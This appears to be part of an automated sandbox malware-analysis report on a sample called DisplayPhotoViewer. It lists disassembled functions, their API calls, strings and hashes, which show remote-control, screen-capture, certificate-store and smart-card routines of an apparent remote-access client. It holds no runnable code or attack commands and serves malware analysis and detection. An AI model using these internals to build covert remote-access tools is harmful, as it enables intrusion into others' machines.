                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5dcc8c42a42182806a99541108ff3f0f53c288dc17f7a39b9406e1488bd1f562
                                                                                                    • Instruction ID: e98f278736246bbdba35ed73b035bc52c035c4c0022e53f9561e4253a07fdea9
                                                                                                    • Opcode Fuzzy Hash: 5dcc8c42a42182806a99541108ff3f0f53c288dc17f7a39b9406e1488bd1f562
                                                                                                    • Instruction Fuzzy Hash: 2CF0A4729105185BDB68CA6C9C057A7B6E9FB84310F0043AAFA19E32D0EEB05E448794
                                                                                                    Function 1105F280 Relevance: 149.1, APIs: 42, Strings: 43, Instructions: 353libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_version), ref: 1105F297
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_installed), ref: 1105F2BC
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_netname), ref: 1105F2E2
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_remotename), ref: 1105F308
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_bridgename), ref: 1105F32E
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_networks), ref: 1105F354
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_pingnet), ref: 1105F37A
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_open), ref: 1105F3A0
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_close), ref: 1105F3C6
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_getsession), ref: 1105F412
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_call), ref: 1105F438
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_hangup), ref: 1105F45E
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_nsessions), ref: 1105F484
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_connected), ref: 1105F4AA
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_send), ref: 1105F4D0
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_sendex), ref: 1105F4F6
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_sendif), ref: 1105F50B
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_sendto), ref: 1105F531
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_subset), ref: 1105F53C
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_helpreq), ref: 1105F588
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_maxpacket), ref: 1105F5AE
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_openremote), ref: 1105F5D4
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_closeremote), ref: 1105F5FA
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_callremote), ref: 1105F620
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_pause), ref: 1105F562
                                                                                                      • Part of subcall function 11027F50: _strrchr.LIBCMT ref: 11028045
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028084
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_findslaves), ref: 1105F3EC
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_myaddr), ref: 1105F646
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_loadbridge), ref: 1105F651
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_getfailedreason), ref: 1105F65C
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_escape), ref: 1105F667
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_publishservice), ref: 1105F672
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_publishserviceex), ref: 1105F67D
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_findslavesex), ref: 1105F68B
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_broadcastdata), ref: 1105F696
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_sendname), ref: 1105F6A4
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_getlocalipaddressinuse), ref: 1105F6B2
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_clientpinrequest), ref: 1105F6C0
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_controlsendpin), ref: 1105F6CE
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_controlpinrequest), ref: 1105F6DC
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_clearpin), ref: 1105F6EA
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_getcodepage), ref: 1105F6F8
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_getconnectivityinfo), ref: 1105F706
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                                    • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                                    • API String ID: 1096595926-1306570422
                                                                                                    • Opcode ID: 114b7e0c9b3e1cc71403910bfa266d7af1874816bc9f9ff65f958154a5e81df9
                                                                                                    • Instruction ID: 2e05b051598513aa075e58ee5873086ad3e44bb143af65d05a09765a4d411fd5
                                                                                                    • Opcode Fuzzy Hash: 114b7e0c9b3e1cc71403910bfa266d7af1874816bc9f9ff65f958154a5e81df9
                                                                                                    • Instruction Fuzzy Hash: 6BA18C74F01B4B3AE3E1AB378C94F9FFAE86F21548F80052FB569F5505EB24E002456A
                                                                                                    Function 110A7390 Relevance: 63.1, APIs: 18, Strings: 18, Instructions: 116libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Crypt32.dll,00000000,?,110A8165,218EC38C,?,?,?,?,11179CDB,000000FF,?,110ED4E1,00000000,00000000,?), ref: 110A73D0
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertCreateCertificateContext), ref: 110A73EC
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertFreeCertificateContext), ref: 110A73F9
                                                                                                    • GetProcAddress.KERNEL32(?,CertGetNameStringA), ref: 110A7406
                                                                                                    • GetProcAddress.KERNEL32(?,CertGetValidUsages), ref: 110A7413
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertOpenStore), ref: 110A7420
                                                                                                    • GetProcAddress.KERNEL32(?,CertOpenSystemStoreA), ref: 110A742D
                                                                                                    • GetProcAddress.KERNEL32(?,CertCloseStore), ref: 110A743A
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertAddCertificateContextToStore), ref: 110A7447
                                                                                                    • GetProcAddress.KERNEL32(?,CertAddEncodedCertificateToStore), ref: 110A7454
                                                                                                    • GetProcAddress.KERNEL32(?,CertSetCertificateContextProperty), ref: 110A7461
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertGetCertificateContextProperty), ref: 110A746E
                                                                                                    • GetProcAddress.KERNEL32(?,CryptAcquireCertificatePrivateKey), ref: 110A747B
                                                                                                    • GetProcAddress.KERNEL32(?,CertEnumCertificatesInStore), ref: 110A7488
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertGetEnhancedKeyUsage), ref: 110A7495
                                                                                                    • GetProcAddress.KERNEL32(?,CertGetCertificateChain), ref: 110A74A2
                                                                                                    • GetProcAddress.KERNEL32(?,CertVerifyCertificateChainPolicy), ref: 110A74AF
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertFreeCertificateChain), ref: 110A74BC
                                                                                                    Strings
                                                                                                    • CertFreeCertificateContext, xrefs: 110A73F3
                                                                                                    • CertFreeCertificateChain, xrefs: 110A74B4
                                                                                                    • CertGetCertificateContextProperty, xrefs: 110A7468
                                                                                                    • CertGetValidUsages, xrefs: 110A740A
                                                                                                    • CertOpenSystemStoreA, xrefs: 110A7424
                                                                                                    • CertCloseStore, xrefs: 110A7431
                                                                                                    • CertOpenStore, xrefs: 110A741A
                                                                                                    • CertCreateCertificateContext, xrefs: 110A73E6
                                                                                                    • CertGetCertificateChain, xrefs: 110A7499
                                                                                                    • CertAddCertificateContextToStore, xrefs: 110A7441
                                                                                                    • CertGetEnhancedKeyUsage, xrefs: 110A748F
                                                                                                    • CertSetCertificateContextProperty, xrefs: 110A7458
                                                                                                    • CertVerifyCertificateChainPolicy, xrefs: 110A74A6
                                                                                                    • CertAddEncodedCertificateToStore, xrefs: 110A744B
                                                                                                    • Crypt32.dll, xrefs: 110A7396
                                                                                                    • CertGetNameStringA, xrefs: 110A73FD
                                                                                                    • CertEnumCertificatesInStore, xrefs: 110A747F
                                                                                                    • CryptAcquireCertificatePrivateKey, xrefs: 110A7472
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: CertAddCertificateContextToStore$CertAddEncodedCertificateToStore$CertCloseStore$CertCreateCertificateContext$CertEnumCertificatesInStore$CertFreeCertificateChain$CertFreeCertificateContext$CertGetCertificateChain$CertGetCertificateContextProperty$CertGetEnhancedKeyUsage$CertGetNameStringA$CertGetValidUsages$CertOpenStore$CertOpenSystemStoreA$CertSetCertificateContextProperty$CertVerifyCertificateChainPolicy$Crypt32.dll$CryptAcquireCertificatePrivateKey
                                                                                                    • API String ID: 2238633743-547962868
                                                                                                    • Opcode ID: 4b252f35d055b35c09c404d24f89df38d72193acb4da89a5ea76e658877d960a
                                                                                                    • Instruction ID: eef0ae6ab9b4f348f8d217723624c9e80431775891afe325a1943703229e83df
                                                                                                    • Opcode Fuzzy Hash: 4b252f35d055b35c09c404d24f89df38d72193acb4da89a5ea76e658877d960a
                                                                                                    • Instruction Fuzzy Hash: 684121B0A01B08ABC760EF6BD984D56FBE9BFA86003514D1FE4D6D3A24D7B4A4408F58
                                                                                                    Function 110FF810 Relevance: 59.9, APIs: 18, Strings: 16, Instructions: 408synchronizationthreadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000008,?,?,?,?,?), ref: 110FF926
                                                                                                    • GetLastError.KERNEL32(?,?,?), ref: 110FF93A
                                                                                                    • GetTickCount.KERNEL32 ref: 110FF968
                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000001,110F6B40,00000001,00000000,00000000,00000001,00000008,?,?,?,?,?), ref: 110FF9EE
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 110FF9F5
                                                                                                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 110FFA07
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,?), ref: 110FFA19
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 110FFA39
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000207,00000000,00000001,00000008,?,?,?,?,?), ref: 110FFA59
                                                                                                    • wsprintfA.USER32 ref: 110FFA85
                                                                                                    • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 110FFBD8
                                                                                                    • GetLastError.KERNEL32 ref: 110FFBE2
                                                                                                    • _memset.LIBCMT ref: 110FFC05
                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 110FFC28
                                                                                                    • GetPriorityClass.KERNEL32(00000000), ref: 110FFC2F
                                                                                                    • CloseHandle.KERNEL32(?), ref: 110FFC63
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110FFC84
                                                                                                    • GetTickCount.KERNEL32 ref: 110FFD12
                                                                                                    Strings
                                                                                                    • /TS , xrefs: 110FFB1D
                                                                                                    • Error. Null psi for session %d, xrefs: 110FF88D
                                                                                                    • CurrentSession %d appears invalid. Reset to -1, xrefs: 110FF95B
                                                                                                    • Error. terminating ui client, xrefs: 110FFA23
                                                                                                    • Exec %d-%s ret %d (h=%x), xrefs: 110FFCEE
                                                                                                    • D, xrefs: 110FFC14
                                                                                                    • " %s , xrefs: 110FFA7F
                                                                                                    • /VistaUI , xrefs: 110FFAAC
                                                                                                    • DisableConsoleClient, xrefs: 110FFAC8
                                                                                                    • clientname, xrefs: 110FFB45
                                                                                                    • Warning. Session %d disconnected - not launching client, xrefs: 110FF9AD
                                                                                                    • Restarting client after aborted logoff., xrefs: 110FF8D1
                                                                                                    • Warning. WTSQuerySessionInformation(%d) failed - not launching client, e=%d, xrefs: 110FF93E
                                                                                                    • Error. settok(%x, seshid %d) ret %d, e=%d, xrefs: 110FFBED
                                                                                                    • Error. ExecProcessAsUser ret %d, xrefs: 110FFC76
                                                                                                    • /S , xrefs: 110FFAF8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$ErrorLast$CountPriorityTick$ClassCurrentExchangeFileInformationInterlockedModuleNameObjectProcessSingleThreadTokenWait_memsetwsprintf
                                                                                                    • String ID: " %s $/S $/TS $/VistaUI $CurrentSession %d appears invalid. Reset to -1$D$DisableConsoleClient$Error. ExecProcessAsUser ret %d$Error. Null psi for session %d$Error. settok(%x, seshid %d) ret %d, e=%d$Error. terminating ui client$Exec %d-%s ret %d (h=%x)$Restarting client after aborted logoff.$Warning. Session %d disconnected - not launching client$Warning. WTSQuerySessionInformation(%d) failed - not launching client, e=%d$clientname
                                                                                                    • API String ID: 161374856-1113802814
                                                                                                    • Opcode ID: ab54339d03b215b42ef36223db73d73db787844d0a5e20e46cf88daf4eb45615
                                                                                                    • Instruction ID: a46e1cad5d72c9d40e41f4cfdedf20ffcfcccf4e3f1fa8da8475f26faf3f8bfc
                                                                                                    • Opcode Fuzzy Hash: ab54339d03b215b42ef36223db73d73db787844d0a5e20e46cf88daf4eb45615
                                                                                                    • Instruction Fuzzy Hash: 4DE12776D006669FDB11DF64DC89B9EBBF4EF44309F0041E9E91497284EB709944CF92
                                                                                                    Function 110A7540 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 96libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110A7883,00000000,00000001,00000000,?,11179C68,000000FF,?,110A82D2,?,?,00000200,?), ref: 110A7554
                                                                                                    • GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110A7571
                                                                                                    • GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110A757E
                                                                                                    • GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110A758C
                                                                                                    • GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110A759A
                                                                                                    • GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110A75A8
                                                                                                    • GetProcAddress.KERNEL32(?,SCardCancel), ref: 110A75B6
                                                                                                    • GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110A75C4
                                                                                                    • GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110A75D2
                                                                                                    • GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110A75E0
                                                                                                    • GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110A75EE
                                                                                                    • GetProcAddress.KERNEL32(?,SCardControl), ref: 110A75FC
                                                                                                    • GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110A760A
                                                                                                    • GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110A7618
                                                                                                    • GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110A7626
                                                                                                    • GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110A7634
                                                                                                    • GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110A7642
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: SCardBeginTransaction$SCardCancel$SCardConnectA$SCardControl$SCardDisconnect$SCardEndTransaction$SCardEstablishContext$SCardFreeMemory$SCardGetAttrib$SCardGetCardTypeProviderNameA$SCardGetStatusChangeA$SCardIsValidContext$SCardListCardsA$SCardListReadersA$SCardReconnect$SCardReleaseContext$Winscard.dll
                                                                                                    • API String ID: 2238633743-561486686
                                                                                                    • Opcode ID: 624ea43a586893aec607865c13f3f2bec695e55b3c69a5d79ff9c79e1c9ad6b5
                                                                                                    • Instruction ID: 68c3a33c2ca5690a9c2bd61a985eb1395271a0d1fc459ac1270770452b6c5d08
                                                                                                    • Opcode Fuzzy Hash: 624ea43a586893aec607865c13f3f2bec695e55b3c69a5d79ff9c79e1c9ad6b5
                                                                                                    • Instruction Fuzzy Hash: 7D3198B1A00B58ABC720EFBB9D44E5BF7F9BE986003454D1EE296D3A14DA75F4008F58
                                                                                                    Function 1111F9C0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 199libraryprocessloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,218EC38C,75BF3760,?,75BF7A80), ref: 1111FA07
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 1111FA78
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1111FA8C
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1111FAA6
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1111FACC
                                                                                                    • _memset.LIBCMT ref: 1111FB2A
                                                                                                    • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 1111FB6F
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1111FB86
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 1111FBA0
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1111FBC4
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1111FBCD
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1111FC1A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseHandleLibrary$AddressCodeCreateCurrentErrorExitFileFreeLastLoadModuleNameObjectProcSingleWait_memset
                                                                                                    • String ID: "$CSmartcardDeviceMngr - PscrInstallDeviceW failed (%d)$CSmartcardDeviceMngr - failed to load pscrinst.dll (%d)$D$IsWow64Process$Kernel32.dll$PscrInstallDeviceW$Root\NS-PseudoSmartCardReader$\winst64.exe" /q /q /si$nspscr.inf$pscrinst.dll
                                                                                                    • API String ID: 3751713381-2378866903
                                                                                                    • Opcode ID: 36620e47758454690b36998956692e3904e3c91b66227346fd62a84f8fbf3434
                                                                                                    • Instruction ID: 4638fe52077647896a28e95e355c44b958c9cadfd5662490dee9c3354a3cbf9e
                                                                                                    • Opcode Fuzzy Hash: 36620e47758454690b36998956692e3904e3c91b66227346fd62a84f8fbf3434
                                                                                                    • Instruction Fuzzy Hash: 7C814FB59012699FDB20DF65DCC8B9EFBB8FB58304F1041EAE819A7244DB345A84CF61
                                                                                                    Function 110AD790 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 178filewindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110AD7C0
                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110AD7D1
                                                                                                    • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110AD7DF
                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110AD813
                                                                                                    • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110AD836
                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110AD852
                                                                                                    • GetDC.USER32(00000000), ref: 110AD878
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110AD88C
                                                                                                    • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110AD8AF
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110AD8C6
                                                                                                    • GetTickCount.KERNEL32 ref: 110AD8CF
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110AD906
                                                                                                    • GetTickCount.KERNEL32 ref: 110AD90F
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 110AD91E
                                                                                                    • GdiFlush.GDI32 ref: 110AD932
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110AD93D
